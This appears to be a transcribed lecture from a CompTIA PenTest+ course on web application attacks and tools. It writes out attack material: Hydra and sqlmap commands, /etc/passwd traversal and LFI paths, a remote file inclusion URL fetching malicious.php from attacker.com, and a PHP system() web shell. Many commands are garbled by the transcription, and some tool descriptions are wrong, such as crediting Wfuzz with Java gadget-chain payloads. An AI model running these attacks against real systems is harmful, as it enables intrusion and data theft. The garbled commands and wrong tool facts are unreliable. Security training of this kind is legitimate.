In this section of our CompTIA PenTest Plus PT0-003 certification course, we're going to dive into the realm of web application attacks. This is an essential component of penetration testing. Web applications are often the prime targets for attackers due to their accessibility and the valuable data they often contain. By understanding web application attacks, you'll be better equipped to identify vulnerabilities and protect web applications effectively. We'll cover various methods and techniques used in attacking web apps and discuss their significance in penetration testing. Now let's move on to slide 2, where we'll discuss brute force attacks. We'll define what a brute force attack is, explore the impact such attacks can have, and go over some techniques for executing them. As an example, we'll see how to use the tool Hydra to brute force login credentials. The command we'll use is bash hydra ladmin p path2 passwords.txt http post form /login username user and password equals pass. Stay tuned as we break down how this command works and how you can apply it in your penetration testing efforts. In this slide, we are discussing brute force attacks. To start with, let's define what a brute force attack is. A brute force attack is a trial and error method used to decode encrypted data such as passwords or data encryption standard DS keys through exhaustive effort rather than employing intellectual strategies. The impact of brute force attacks is significant. Successful brute force attacks can lead to unauthorized access to an application, database, or network. This can result in data breaches, financial loss, and damage to a company's reputation. Now, let's look at the techniques for performing brute force attacks. One common technique is to use automated tools like Hydra to systematically enter password or passphrase guesses until the correct one is found. Hydra is often used for rapid, automated attacks on login credentials. For example, using Hydra, you can execute a brute force attack on a web application login form with the following command: hydra-l add-p-path to passwords.txt hform /login username user and password equals pass. In this command, -l-admin specifies the username to test. -p-path to passwords.txt points to a text file containing a list of possible passwords, and http post form indicates that the attack will target an http post form. Understanding and executing brute force attacks can help you pinpoint vulnerabilities in web applications and implement stronger security measures to protect against these types of threats. In the next slide, we will delve into collision attacks, where we will explore what collision attacks are, their impact, and techniques for performing them, including understanding hash collisions and their implications. In our last slide, we discussed brute force attacks, looking into their definitions, the techniques used, and even demonstrated an example using Hydra to brute force login credentials. Now, let's move on to our current topic, collision attacks. So, what exactly is a collision attack? Simply put, a collision attack occurs when two different inputs produce the same hash output. This can be particularly devastating because it can lead to hash collisions, where an attacker can substitute a malicious input for a benign one without detection. The impact of collision attacks is significant as it undermines the integrity of any system that relies on hashing for security, including digital signatures and file integrity checks. If an attacker can generate collisions for a cryptographic hash function, they can potentially introduce malicious data into the system, bypassing security checks. As for techniques, attackers often target weaknesses in specific hash functions, using sophisticated algorithms and a lot of computational power to find collisions. One well-known method is the birthday attack, which exploits the mathematics behind the probability of hash collisions. To illustrate, let's delve into an example. A hash collision. Imagine two distinct files, file A and file B. Under normal circumstances, these would generate different hash values. However, using a collision attack, an attacker can craft file B to produce the same hash as file A. This could trick verification systems into accepting file B as legitimate, even though it might contain harmful code. Understanding hash collisions and their implications is crucial for anyone involved in cybersecurity. It highlights the importance of using strong cryptographic hash functions and staying abreast of current vulnerabilities. In our next slide, we will discuss directory traversal attacks. We'll define what they are, explore the techniques behind them, and look at an example such as exploiting directory traversal vulnerabilities to access restricted files. So let's move on to directory traversal attacks. Moving on to slide 4, let's dive into the topic of directory traversal attacks. A directory traversal attack, also known as path traversal, involves exploiting vulnerabilities in a web application's file handling mechanisms to access files and directories outside the intended directory. This can lead to significant security breaches by exposing sensitive files and data. Directory traversal attacks work by manipulating file paths to navigate the file system. Attackers can craft URLs that include sequences like // to move up the directory tree and access restricted files. For instance, a vulnerable application might allow an attacker to download sensitive files by inputting a malicious path, such as example.com/download files//@/passwd. In this example, the attacker is attempting to access the /etc passb file, which contains user account information on Unix-like systems. If successful, this could expose passwords, configurations, and other critical information that could be leveraged for further attacks. Understanding and mitigating directory traversal vulnerabilities is crucial for maintaining the security of web applications. Proper input validation, sanitizing user inputs, and implementing least privilege principles can help prevent these attacks. Next, we'll explore server-side request forgery, SSRF, its definition, impact, and techniques for performing such attacks. Stay tuned. Continuing from our previous discussion on directory traversal, we now move on to another significant vulnerability, server-side request forgery, or SSRF. In an SSRF attack, the attacker exploits the server's ability to make HTTP requests on behalf of the user. The malicious actor manipulates these requests to access or interact with internal services, potentially leaking sensitive information or causing other destructive behavior. The impact of SSRF attacks can be quite severe. They can lead to unauthorized access to internal systems, exposing critical internal applications that are not intended to be internet-facing. This can result in data breaches and further penetration into internal network segments. There are several techniques to perform SSRF attacks. One common method is by injecting malicious payloads into URL parameters. For example, using a common tool like Burp Suite, an attacker can craft specific SSRF payloads to manipulate the server into making requests to internal resources. Here's a rudimentary example. http://example.com/ssrf ssrh internal.server/admin. In this scenario, the attacker is tricking the server to make a request to an internal endpoint, which could potentially reveal sensitive admin resources. This brings us to our next topic on the list, cross-site request forgery, CSRF. In the following slides, we will define CSRF attacks, explore common techniques, and discuss a practical example of how to create a CSRF exploit using Burp Suite. Let's proceed to understand CSRF in more detail. On this slide, we'll be shifting our focus from server-side request forgery, SSRF, to another critical web application vulnerability, cross-site request forgery, or CSRF. First, let's define what a CSRF attack entails. CSRF is a type of attack that tricks a user into performing an action they didn't intend to, often without their knowledge. The attacker does this by exploiting the user's authenticated session with a trusted site. The nature of the impact can range from privilege escalation to unauthorized financial transactions and data manipulation, thus making these attacks particularly dangerous. Now, let's go over some techniques used to perform CSRF attacks. One common technique involves social engineering, where the attacker sends a malicious link or form to the victim. Once the victim, who is already authenticated, clicks the link or submits the form, the malicious request gets executed under their session. To give a real-world example, we'll see how we can create a CSRF exploit using Burp Suite. The HTML snippet on this slide shows a form covertly crafted to transfer money from the victim's account to the attacker's account without the victim's consent. The form action points to a financial transfer endpoint, which the attacker aims to exploit. Moving forward to the next slide, we'll dive into deserialization attacks, their fundamentals, and how they can be leveraged, particularly in Java applications. Let's dive into deserialization attacks. Like cross-site request forgery, CSRF, deserialization attacks pose a significant security risk to web applications. In essence, deserialization is the process of converting data from a string format back into objects. When an application does this process with data that is not trusted, it exposes itself to potential attacks. These attacks can lead to arbitrary code execution, allowing an attacker to gain unauthorized control over the application. Commonly, deserialization vulnerabilities are found in applications that use Java, PHP, Python, and other languages that support serialization. Attackers exploit insecure deserialization by modifying serialized object data before sending it to the server, which can then be executed if proper validation isn't implemented. For our example, we will look into exploiting insecure deserialization in a Java application. We might use tools like Wfuzz, which generates payloads that leverage gadget chains in common libraries to achieve remote code execution. In the next slide, we will discuss SQL injection attacks. We'll cover the definition and impact of SQL injection, techniques attackers use, and demonstrate how to exploit SQL injection vulnerabilities using a powerful tool called SQLmap. Let's move forward to understand this pervasive issue and ways to defend against it. Now moving on to SQL injection attacks. In this slide, we'll delve into what SQL injection is and the kind of damage it can inflict on your applications. First, let's define SQL injection. SQL injection is a code injection technique that might destroy your database. It happens when attackers can insert or manipulate SQL queries in an application's input fields, leading to unauthorized access to the database, data leakage, or even complete control over the database server. Next, let's talk about the techniques for performing SQL injection attacks. Attackers typically look for vulnerabilities in input fields such as login forms, search bars, or URL parameters. By injecting carefully crafted SQL queries, they can bypass authentication checks, extract sensitive data, or manipulate database contents. To illustrate, we'll use an example with a well-known tool called SQLmap. Here's a command where we use SQLmap to exploit SQL injection vulnerabilities in a URL with a parameter. SQL-example.com/vulnerable ID batch-dbs. In this example, the -dbs option tells SQLmap to list the databases available on the server. This command is run in batch mode, automating the attack and listing out databases without further user interaction. By understanding how SQL injection works and employing tools like SQLmap, we gain insight into how attackers operate, which is crucial for defending against these kinds of threats. In the next slide, we will explore command injection attacks, discussing their definitions, impacts, and techniques. Stay tuned as we continue to uncover these critical application security topics. In this slide, we're shifting our focus to command injection attacks. Similar to SQL injection, command injection involves manipulating input to execute arbitrary commands on the host operating system. The impact of these attacks can be severe, allowing an attacker to gain unauthorized access to system resources, manipulate data, or even take complete control of the system. There are several techniques for performing command injection attacks. Attackers typically look for web applications that pass user input directly to system commands. By carefully crafting input, they can inject additional commands to be executed. For example, an application accepting a parameter keymade to execute shell commands can be exploited by injecting additional commands like ls to list directory contents. As shown in the example, the URL hijacking exec ls would execute the ls command and potentially expose sensitive information. Understanding the nature and impact of command injection is crucial for developing robust security measures to protect your applications. In the next slide, we will explore cross-site scripting XSS attacks, another common and dangerous vulnerability. We'll cover its definition, impact, and techniques, and we'll provide an example of exploiting XSS vulnerabilities using Burp Suite with a simple script injection. Now that we have discussed command injection, let's move on to another significant type of web vulnerability, cross-site scripting, commonly known as XSS. In this slide, we will cover the definition and impact of XSS attacks. XSS occurs when an attacker is able to inject malicious scripts into web pages viewed by other users. These attacks can lead to various malicious activities such as stealing cookies, session tokens, or even redirecting users to malicious websites. Next, we will look at the techniques for performing XSS attacks. These can include reflected, stored, and DOM-based XSS. Understanding these techniques is crucial for identifying and mitigating vulnerabilities in your applications. Finally, we'll go through an example of exploiting XSS vulnerabilities using Burp Suite, a popular tool for web security testing. Consider a scenario where a script such as script alert XSS is injected into a vulnerable web application, leading to a pop-up alert. This emphasizes the immediate risk posed by XSS vulnerabilities. Next, we will discuss server-side template injection, looking into its definition, impact, techniques, and examples. On the previous slide, we delved into cross-site scripting, commonly known as XSS. We explored its definition, the impact these security flaws can have, and demonstrated techniques to execute XSS attacks using tools like Burp Suite. Now, shifting our focus to server-side template injection, or SSTI, let's start by understanding what it is. SSTI occurs when user inputs are concatenated into templates and evaluated by the server's rendering engine. This can allow an attacker to execute arbitrary code on the server, potentially leading to data breaches, system compromise, and even remote code execution. To perform SSTI attacks, attackers often identify injection points by using payloads that can manipulate the template syntax. Techniques include introducing placeholders or expressions that break out of the intended context, thereby injecting malicious code. To better illustrate this, we can take an example of a vulnerable web application using a template engine like Jinja2 or Twig. By exploiting SSTI, an attacker might inject code such as 77 into the template. If executed by the server, this payload may return 49, validating the presence of a vulnerability. From there, the attack can be escalated to perform more harmful actions, such as executing system commands. In the next slide, we'll cover Insecure Direct Object Reference, or IDOR. We will discuss the definition and impact of IDOR attacks, demonstrate techniques for performing these attacks, and provide an example of exploiting IDOR to access unauthorized resources. In the previous slide, we covered server-side template injection, discussed its definition, impact, and techniques for performing such attacks, and even walked through an example of exploiting SSTI in a web application template engine. Now, let's turn our attention to Insecure Direct Object Reference, or IDOR attacks. In this section, we'll dive into what IDOR is and understand its impact. We'll examine the techniques attackers use to perform these attacks and provide a practical example of exploiting an IDOR vulnerability to gain access to unauthorized resources. IDOR occurs when an application exposes a reference to an internal implementation object, such as a file, directory, or database key, which an attacker can manipulate. If proper authorization checks are not performed, the attacker can access or modify these back-end resources, leading to potential data breaches or unauthorized actions. Our example will illustrate how straightforward it can be to exploit an IDOR vulnerability. By manipulating the URL or the parameters being used, an attacker might access resources that should be off-limits. Understanding this is crucial for securing your applications against such threats. In the next slide, we will move on to discuss session hijacking, exploring its definition, impact, and techniques, including a practical example using Burp Suite to hijack sessions. Let's move on to our next topic, session hijacking. This attack method is critical to understand due to the severe consequences it can have on user security and system integrity. Firstly, the definition. Session hijacking occurs when an attacker takes over a user's session, typically through methods like stealing session cookies or manipulating session tokens. The impact of such attacks can be substantial, as an attacker may gain unauthorized access to a user's account and perform any actions that the legitimate user is authorized to do. Next, we will delve into the techniques employed in session hijacking. Common methods include session fixation, where an attacker sets or influences a valid session identifier. 2. Session sidejacking involves intercepting network traffic to steal session cookies. 3. Cross-site scripting, XSS, used to capture session tokens from a user's browser. To illustrate, we will go through a practical example utilizing Burp Suite, a powerful tool for web vulnerability testing. Burp Suite allows us to intercept and manipulate HTTP requests, making it possible to capture session tokens and hijack an active session. By understanding these methods and practicing with tools like Burp Suite, we can better protect our applications and users from such vulnerabilities. Next, we will explore arbitrary code execution, where we will discuss its impact, techniques, and a practical exploitation example. On this slide, we will be discussing arbitrary code execution, a critical vulnerability that can lead to severe security breaches. First, let's define what arbitrary code execution entails. Essentially, it is the ability for an attacker to execute any code of their choosing on a target system. This typically occurs when an application fails to properly validate and sanitize user inputs, allowing malicious code to be inserted and run. The impact of arbitrary code execution can be devastating. It can lead to unauthorized access, data breaches, and complete system compromise. Attackers can install malware, retrieve sensitive information, and disrupt normal operations, potentially causing substantial financial and reputational damage. As for techniques, attackers often leverage well-known exploits in software. These exploits take advantage of vulnerabilities such as buffer overflows, improper input validation, or flawed business logic. Crafting specific payloads to trigger these vulnerabilities allows attackers to inject and execute their malicious code. For example, we might exploit a code execution vulnerability in a web application. Using penetration testing tools, we can identify the vulnerability and create a payload that, when executed by the application's server, gives us control over the system. This practical approach is essential for understanding and mitigating these threats. In the next slide, we will discuss remote file inclusion, another serious vulnerability that enables attackers to include remote files through web servers. On the previous slide, we dove into the concept of arbitrary code execution, exploring its definition, the techniques commonly employed in these attacks, and an example that showcased how vulnerabilities can be exploited to execute arbitrary code. Now let's shift our focus to another critical type of web security vulnerability: remote file inclusion, or RFI. Remote file inclusion is a vulnerability that allows an attacker to include a remote file, typically through a script on the web server. This can happen when the user input is not properly validated and sanitized, enabling the inclusion of remote files. The impact of RFI attacks can be significant. They can lead to arbitrary code execution on the server, data breaches, or the complete takeover of the vulnerable web application. It's a powerful technique for attackers, mainly because it allows them to execute scripts on servers remotely. To better understand this, let's look at an example URL format that illustrates an RFI attack. example.com/index.php page http://attacker.com/malicious.php. Here, the page parameter is being manipulated to fetch and include a malicious file hosted on an attacker-controlled server. This malicious file might contain code designed to compromise the target server. In our next slide, we'll explore local file inclusion, or LFI, which shares similarities with RFI, but involves including local files on the server rather than remote ones. In the previous module, we discussed remote file inclusion, or RFI, where an attacker includes a remote file in a web application, typically leading to the execution of malicious code hosted on a remote server. Now we're moving on to local file inclusion, or LFI, attacks. Local file inclusion is quite similar to RFI, but instead of including files from a remote server, the attacker includes files that are already present on the local server. The impact of LFI can be just as severe as RFI, as it might give the attacker access to sensitive files stored on the server, or even allow the execution of local scripts. In an LFI attack, an attacker manipulates the parameters of a web application to include arbitrary files. For instance, they might alter the input to a PHP script from something benign like page equals home to something malicious like page equals slack/bool /past. This specific example tries to read the contents of the //e/passwd file on a Unix-based system, which contains user account information. Understanding the techniques for performing LFI attacks is crucial for crafting effective defenses. We'll look into directory traversal, null byte injection, and the various ways in which attackers might exploit improperly sanitized input variables. Having said that, in our next module, we'll dive into Webshell attacks. We'll define web shells, explain their impact, and discuss techniques for uploading and using a web shell, which could involve commands like php, system. This will round out our understanding of how attackers leverage file inclusion vulnerabilities to compromise a system. Let's proceed by breaking down LFI attacks in detail. Slide 17, Webshell. Now that we've discussed local file inclusion, LFI, and its potential impacts, let's move on to another critical topic, Webshell attacks. A Webshell is a malicious script that attackers upload to a web server. It's used to gain remote access and control over the server. Essentially, a Webshell acts as a command shell that allows attackers to execute arbitrary commands on the compromised server. The impact of a successful Webshell attack can be severe, including full control over the server exfiltration and further exploitation of the network. There are various techniques for Webshell attacks. One common method is to exploit file upload vulnerabilities to upload a malicious script. Attackers can also leverage other vulnerabilities like LFI or remote file inclusion, RFI, to introduce a web shell. One classic example of a web shell is a simple PHP script like this: PHP system get dm. With this script uploaded to the server, an attacker could execute arbitrary system commands via HTTP requests, such as example.com/shell.phpmd=ls. This would allow them to list the files in the web directory. With more sophisticated scripts, attackers can conduct a wide range of malicious activities, making web shells a significant concern for web security. In the next slide, we'll dive into the topic of API abuse. We'll look at the definition, the potential impact, techniques used to perform these attacks, and how attackers can exploit insecure API endpoints. In slide 17, we discussed web shell attacks, covering their definition, the techniques involved, and presented an example where a PHP web shell was uploaded and used to execute commands on a server. Now, moving on to slide 18, we will delve into API abuse. Let's start with the definition. API abuse refers to the exploitation of APIs, application programming interfaces, in unintended or malicious ways, leading to various security vulnerabilities and potentially severe impacts. This kind of abuse can result in unauthorized data access, service disruptions, and other critical security breaches. There are several techniques attackers use to perform API abuse attacks. These may include manipulating API requests and responses, exploiting poorly designed API endpoints, leveraging insufficient authentication, and taking advantage of unsecured data in transit. To illustrate this, let's consider an example of exploiting insecure API endpoints. Imagine an API designed to fetch user details without proper authentication controls. An attacker could potentially query this endpoint to retrieve sensitive information about users, leading to a data breach. Understanding API abuse is crucial for securing your applications. By recognizing these risks and implementing robust security measures like rate limiting, strong authentication, and thorough input validation, we can mitigate the threats posed by API abuse. In the next slide, slide 19, we will explore JSON Web Token, JWT manipulation. We will define JWT manipulation, analyze its impact, discuss common techniques for performing these attacks, and provide an example of tampering with JWTs to gain unauthorized access. JSON Web Token, JWT manipulation, is another crucial vector of attack you need to be aware of. Let's start with its definition. JWT manipulation involves tampering with the tokens that are commonly used for securely transmitting information between parties as a JSON object. The impact of JWT manipulation can be severe. If an attacker can successfully manipulate a JWT, they could potentially gain unauthorized access to sensitive information or functions within an application. This type of attack can break the integrity, authenticity, and confidentiality guarantees that JWTs are supposed to provide. Techniques for performing JWT manipulation attacks often involve exploiting weaknesses in the JWT implementation or misconfigurations. For instance, attackers might alter the payload data or modify the signature if the secret key is weak or improperly handled. An example of JWT manipulation could involve tampering with a JWT to escalate privileges within an application. For illustration, an attacker could change their user role from user to admin within the payload if the signature verification process is flawed or if the algorithm is weak. Understanding JWT manipulation is essential for both offense and defense in application security. In the next slide, we'll shift our focus to an overview of tools commonly used for web application attacks, and we'll discuss why selecting the right tools for each type of attack is critical. This knowledge will further empower you to both carry out and defend against various web application attacks effectively. Let's move on. In the previous slide, we discussed JSON Web Token, JWT manipulation, covering its definition, the impact of such manipulations, various techniques for performing JWT manipulation attacks, and provided an example illustrating how tampering with JWTs can lead to unauthorized access. Now let's dive into an overview of tools utilized in web application attacks. It's crucial to understand that the selection of the right tool for each specific attack type is a critical step in ensuring the effectiveness and efficiency of your security testing efforts. Proper tool selection can greatly influence the success of your attack simulations and the quality of your findings. In the next slide, we will delve into Truffle Hog, a valuable tool for security testing. We'll cover an overview of Truffle Hog, discuss techniques for using it in web application attacks, and provide an example of how to use Truffle Hog to uncover secrets in code repositories, such as through a GitHub repository link. Now let's move on to slide 21, where we'll discuss Truffle Hog, a powerful tool designed for scanning and identifying secrets in code repositories. Truffle Hog serves an essential role in web application attacks by helping attackers discover sensitive information such as API keys, passwords, and other private data that may be inadvertently exposed within a codebase. This tool is particularly useful because it scans not just the current state of a repository, but also its history, ensuring that secrets are detected even if they have been removed from the latest version. To effectively use Truffle Hog, you must point it to a specific repository URL and let it perform a deep scan. For example, by running the command trufflehog git github.com/repo, Truffle Hog will analyze the specified repository for any potential secrets hidden within the commit history. In practice, when using Truffle Hog during a web application security assessment, you can help identify areas where proper secret management protocols may not be in place. Uncovering these hidden secrets allows you to alert the development teams about potential vulnerabilities before they cause any damage. Next up on slide 22, we'll be diving into Burp Suite, another powerful tool that offers various capabilities for web application security testing. Stay tuned to learn how to intercept and modify web requests using Burp Suite. On this slide, we're going to shift our focus to another powerful web application security tool, Burp Suite. Burp Suite is a comprehensive platform for performing security testing of web applications. It comes with a multitude of features designed to assist penetration testers and security professionals in finding, exploiting, and managing security vulnerabilities. Some of the key techniques you can use with Burp Suite include intercepting and modifying requests. Burp Suite's proxy allows you to intercept all HTTP and HTTPS traffic between your browser and the target application. This enables you to inspect and modify requests and responses on the fly, giving you the ability to easily identify and exploit vulnerabilities such as SQL injection, CSRF, and more. Let's look at an example to illustrate its use. Imagine you need to test a web application's login form. By configuring Burp Suite to intercept HTTP requests, you can capture the login request, modify parameters such as username and password, and observe how the application responds. This could help you uncover vulnerabilities like authentication bypass or session fixation. In addition to manual testing, Burp Suite offers automated scanning capabilities, which we will explore further as we progress through the course. Next, we'll be discussing another essential tool for web application security testing, Zed Attack Proxy, or ZAP, which provides automated vulnerability scanning among other features. Continuing from our previous discussion on Burp Suite, we now move on to the Zed Attack Proxy, or ZAP. This slide provides an overview of the ZAP tool, which is a popular open-source web application security scanner. We'll look at various techniques for employing ZAP in web application attacks, particularly focusing on its automated scanning capabilities. ZAP is particularly effective for automating the detection of common vulnerabilities in your web applications. One of its key strengths lies in its simplicity and the ability to perform automated vulnerability scanning with minimal effort. In our example, we will demonstrate how to use ZAP to perform an automated vulnerability scan on a web application. This process involves configuring ZAP to intercept requests to identify potential security flaws like SQL injection, cross-site scripting, XSS, and other common vulnerabilities. Moving forward, our next slide will cover another essential tool, Postman. We will explore how Postman can be used to interact with API endpoints, providing an overview of the tool, techniques for testing APIs, and a practical example. In the previous slide, we discussed the Zed Attack Proxy, or ZAP. We covered an overview of the ZAP tool, techniques for using ZAP in web application attacks, and provided an example of using ZAP to perform automated vulnerability scanning. Now let's move on to our current focus, Postman. Postman is a powerful tool widely used by developers for testing APIs. It plays a significant role in web application security by enabling us to test API endpoints comprehensively. We will start with an overview of the Postman tool, exploring its features and why it's useful for web application security testing. Following that, we'll delve into specific techniques for using Postman in web application attacks. This will include setting up various requests, addressing different methods like get, post, put, delete, and understanding how to manipulate and inspect request headers and payloads. Finally, we'll look at a practical example of using Postman to test API endpoints. This example will highlight how you can validate API responses, check for potential security issues, and ensure that your API implementations are secure and robust. In the next slide, we will discuss SQLmap, a specialized tool for automating SQL injection testing. We will provide an overview of SQLmap, techniques for leveraging SQLmap in web application attacks, and an example command for automating SQL injection testing against a vulnerable endpoint. Continuing from where we left off with Postman, let's now shift our focus to another powerful tool used in web application security testing, SQLmap. On this slide, we will delve into the utility of SQLmap as an essential tool for automated SQL injection testing. Firstly, we'll provide an overview of SQLmap, which is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. By using SQLmap, testers can perform a wide range of SQL injection tests on web applications to identify vulnerabilities. Next, we'll explore specific techniques for using SQLmap in web application attacks. SQLmap supports a variety of options and switches that can tailor its behavior, enabling it to perform both basic and highly advanced SQL injection attacks. Finally, we'll look at an example that demonstrates using SQLmap to automate SQL injection testing. In this command, sqlmap.to example.com/vulnerable.batch-dbs, we are telling SQLmap to target a specific URL endpoint. The -batch option allows SQLmap to run without requiring interactive user input, and -dbs enumerates available databases on the server. In the upcoming slide, we will discuss two more directory brute forcing tools, GoBuster and Dirbuster. We'll examine their functionalities, techniques for application in web attacks, and a practical example using GoBuster. Now let's dive into the specifics of SQLmap and how it can be leveraged for SQL injection testing. In the previous slide, we discussed SQLmap, its functionalities, and how it can be used to automate SQL injection testing in web applications. Now let's move on to GoBuster and Dirbuster. GoBuster and Dirbuster are powerful tools used for directory brute forcing in web applications. These tools help you discover hidden directories and files on a web server by trying numerous possibilities from a provided word list. To start with GoBuster, you would typically execute a command like this: bash gobuster dir-u http:/example.com/path to wordlist.txt. This command instructs GoBuster to use the specified word list to find directories on the target website. Both GoBuster and Dirbuster are efficient in identifying directories that aren't publicly listed, thereby assisting in the discovery of potential entry points for further exploits. In the next slide, we will cover Wfuzz, another important tool for fuzzing parameters to discover vulnerabilities. This will equip you further in your journey of web application penetration testing. Now that we've discussed GoBuster and Dirbuster on the previous slide, let's move on to another powerful tool, Wfuzz. In this slide, we'll provide an overview of the Wfuzz tool and explore various techniques for using Wfuzz in web application attacks. Wfuzz is incredibly versatile and allows you to perform fuzzing on web applications to discover hidden parameters, files, and directories. For example, one common use case is parameter fuzzing. This technique can help uncover potential vulnerabilities by testing different input values for web application parameters. The provided command demonstrates how to use Wfuzz to fuzz a parameter named param on a target URL. Wfuzz CZ file path to wordlist.txt-u htexample.com/index.php param. In this command, -c enables colored output for better readability. -z file path to wordlist.txt specifies the input word list to use for fuzzing. Desmo. Example.com/index.php param defines the target URL along with the param parameter to fuzz. This helps in identifying allowable values, enumerating parameters, and potentially discovering vulnerabilities. Up next, we'll cover WPScan, a specific tool designed for scanning WordPress sites. Now that we've covered Wfuzz and how it can be used to fuzz parameters in web applications, let's move on to another essential tool for web application attacks, WPScan. Slide 28 focuses on WPScan. WPScan is a specialized tool used primarily for scanning WordPress sites to uncover potential vulnerabilities. It's particularly valuable because WordPress is one of the most widely used content management systems on the internet, making it a frequent target for attackers. To effectively use WPScan, you'll need to be familiar with various techniques and commands. For instance, you can perform a basic vulnerability scan on a WordPress site with the following command: bash wpscan url htexample.com-enumerate vp. Here, the -URL parameter specifies the target WordPress site, and enumerate vp tells WPScan to enumerate vulnerabilities and plugins. This allows you to identify outdated plugins, weak passwords, and other security issues. With WPScan, you can gather comprehensive data on a WordPress site's security posture, making it an invaluable tool for both attackers and defenders aiming to understand and mitigate potential risks. Up next, we'll wrap up this module with a conclusion and review, summarizing the web application attack techniques and tools we've discussed, and emphasizing the importance of practice and mastery for effective penetration testing. In this final slide, let's wrap up our discussion on web application attack techniques and the various tools we've covered throughout this course. We've looked at the fundamental methods you can use to assess and exploit vulnerabilities in web applications, with specific tools like WPScan for WordPress sites, among others. It's critical to note that simply knowing about these tools and techniques isn't enough. Continuous practice and mastery are key to becoming proficient and successful in penetration testing. You need to keep refining your skills and staying updated with the latest developments in the field. As for your next steps, consider diving deeper into more advanced penetration testing concepts and perhaps specializing in certain types of applications or attack methods. Also, engaging with the cybersecurity community and participating in forums, conferences, and Capture the Flag (CTF) competitions can be incredibly beneficial. Thank you for joining me in this course, and I encourage you to continue your learning journey in web application security and penetration testing.